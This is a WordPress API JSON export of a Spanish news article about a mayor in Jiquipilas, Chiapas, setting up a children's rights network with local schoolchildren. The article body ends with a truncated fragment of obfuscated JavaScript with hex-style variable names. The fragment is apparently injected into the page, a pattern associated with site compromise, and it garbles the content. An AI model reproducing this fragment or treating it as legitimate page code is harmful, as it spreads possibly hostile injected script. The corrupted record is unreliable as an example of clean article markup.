{"id":8647,"date":"2023-02-13T04:53:39","date_gmt":"2023-02-13T04:53:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8647"},"modified":"2023-02-13T04:53:40","modified_gmt":"2023-02-13T04:53:40","slug":"hugo-lazaro-instala-red-de-ninas-y-ninos-impulsores-de-la-transformacion-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8647","title":{"rendered":"Hugo L\u00e1zaro instala Red de Ni\u00f1as y Ni\u00f1os Impulsores de la Transformaci\u00f3n en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230212-WA0007-1024x682.jpg\" alt=\"\" class=\"wp-image-8648\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230212-WA0007-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230212-WA0007-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230212-WA0007-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230212-WA0007-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230212-WA0007.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Reconoci\u00f3 el trabajo de su esposa y Presidenta del DIF Madely Montejo Maza por impulsar los derechos de los ni\u00f1os, ni\u00f1as y adolescentes. \u2022  Felicit\u00f3 a los alumnos quienes se encargar\u00e1n de difundir y promover el conocimiento de sus derechos entre la sociedad.  Jiquipilas, Chiapas. \u2013 El Alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez instal\u00f3 la Red Nacional de Impulsores de la Transformaci\u00f3n la cual qued\u00f3 oficialmente conformada por ni\u00f1os y ni\u00f1as de este municipio.Acompa\u00f1ado de Gabriela Cruz Sandoval representante de Luis Hiram Mancilla Espinosa Delegado del DIF Regional y de Antonio Estrada Ovando Director de la escuela Ignacio Manuel Altamirano, refiri\u00f3 la importancia de este programa federal.Hugo L\u00e1zaro felicit\u00f3 a los 11 alumnos por comprometerse a difundir y promover el conocimiento de sus derechos dentro de su familia, escuela y comunidad a trav\u00e9s de diversas actividades.\u201cUstedes ni\u00f1as y ni\u00f1os cuentan con nuestro reconocimiento y respaldo como Gobierno Municipal, para que participen en sus localidades promoviendo su bienestar social, moral y cultural, as\u00ed como su salud f\u00edsica y mental\u201d, pronunci\u00f3.L\u00e1zaro Rodr\u00edguez reconoci\u00f3 el arduo trabajo que realiza si esposa y Presidenta del DIF Jiquipilas Madely Montejo Maza por impulsar fuertemente los derechos de los ni\u00f1os, ni\u00f1as y adolescentes. El Presidente Municipal desde la sala de Cabildo dijo sentirse muy orgulloso por tener a ni\u00f1os y ni\u00f1as de Jiquipilas destacados y comprometidos con la difusi\u00f3n de sus derechos, lo cual permitir\u00e1 una sociedad m\u00e1s justa.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Reconoci\u00f3 el trabajo de su esposa y Presidenta del DIF Madely Montejo Maza por impulsar los derechos de los ni\u00f1os, ni\u00f1as y adolescentes. \u2022 Felicit\u00f3 a los alumnos quienes se encargar\u00e1n de difundir y promover el conocimiento de sus derechos entre la sociedad. Jiquipilas, Chiapas. \u2013 El Alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez instal\u00f3 la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8648,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8647","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8647","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8647"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8647\/revisions"}],"predecessor-version":[{"id":8649,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8647\/revisions\/8649"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8648"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8647"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8647"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8647"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}